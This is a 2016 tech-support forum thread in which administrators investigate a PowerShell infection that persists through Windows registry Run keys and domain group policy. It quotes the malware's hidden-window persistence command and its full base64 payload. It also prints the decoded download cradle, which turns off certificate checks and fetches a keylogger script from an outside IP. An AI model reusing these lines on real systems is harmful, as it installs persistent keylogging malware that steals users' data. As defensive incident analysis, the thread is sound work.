none
Suspicious Powershell Activity

    Question

  • Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:

    Certificate - cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASABZADUAQgBTADgATgBBAEUASQBYAC8AeQBoADcARQB0AG8AZABzAEUASQB4AEsAUQB2AEEAUQByAFkAaQAwAEYAbABxAHEASQBCADQAbQBtAHoARQBkAHMAOQBrAEoAawA2AG0AbABpAFAALwBkAEoASwBmADMAbQBQAGYAeAA1AG4AMQBzAHoANwAxAGkAYQA5AGUAbwBkAG8AdgB5AFEAdwA0ADMAVABFAEYAWABFAEsAQgBHACsAVQB6AFQAOABZAHAAUwBvAEMAaAA5AGsAUQBQAEYAUABYAGkAcQBRAEkAbABEAEEAZAA2AFgANABCAHEAVABtADEAOQB6AG8AWABKAEUAOAA1AGUAWgA1ADgAZAAzAE0AMQAvAGoASwBYAG8AdAB2ADkARwBwAEcAYQB2AGYAcwBDAHcAOABZAGQAQwBGAGYAZQBCAFQAOABBAHoAVgBWAG8AVgBDAFAAWgA4AGQAVgBMAHMAKwBqAGUAUAByAHgAQwBZADMAOQBqAGEAeABWADMAZABKADMARAB1AGgAVAB1ACsAcAB5AGcAVgBDAHgAZQAxAGwAZwBCAGIAegBCAHMAKwBlADYAOQBrAGkATQAwACsAbwAwAFEAcwBPADAANABVAGIANwBEAE8AegBJAC8AVQBZAHIAVABpAFEAcwBtAFIAbQBlAEQAYwBRAEUAMQBZAGMAaABGAHUAYwA3AEgASQA1AHkAUgA2AE8AZgBzAHkAYwBwADIANQBDAE4AOQB6AHIAUAB3AD0APQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA

    Below is a screenshot of the processes that start when logging in:

    Powershell processes

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,

    Todd

    Monday, July 25, 2016 3:03 PM

All replies

  • after decoding and decompressing the encoded string, one gets to a commmand which downloads a further script:

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    (New-Object Net.WebClient).DownloadString('https://45.56.75.185/script?id=random&name=keylog')

    the resulting script seems to be based on PowerSploit

    Monday, July 25, 2016 7:53 PM
  • OK.  That makes sense since the inital tasks that are started have the web address string in the command line within Task Manager.

    Any idea where this may be downloading the scripts, or where I need to search next for possible infection?

    Thanks,

    Todd

    Monday, July 25, 2016 7:57 PM
  • what do you mean "where this may be downloading the scripts"?
    It is run via the registry key you found, which you should delete.
    It is downloading from the ip address 45.56.75.185.
    The original vector/dropper might have been via browser or email.

    I for myself would nuke from orbit ( = reinstall Windows), but you could contact someone at bleepingcomputer.com

    Monday, July 25, 2016 8:58 PM
  • Unfortunately, when I delete this reg key from my PC, it gets reapplied within a few hours.  I need to find the source PC first before I nuke anything.

    I'll post at bleepingcomputer.com to see if they can help with how to track down the source (and hopefully prevent more!)

    Thanks for the help.

    Todd

    Tuesday, July 26, 2016 11:21 AM
  • We are looking forward to your good news:)


    Please mark the reply as an answer if you find it is helpful.

    If you have feedback for TechNet Support, contact tnmff@microsoft.com

    Wednesday, July 27, 2016 9:44 AM
    Moderator
  • So mystery is somewhat solved.  I traced it down to a powershell command that was placed in our default domain group policy.  I removed this entry and it seems to be slowing removing itself from the network.  

    The next thing to figure out now is where this came from.  There are only three people at our company with the domain password and none of us put that there.  

    The task that was running in the group policy, said it was created by domain\administrator so we are a bit perplexed over this one.  Any ideas on how to trace this part of it?

    Thanks,

    James


    James

    Friday, August 05, 2016 7:53 PM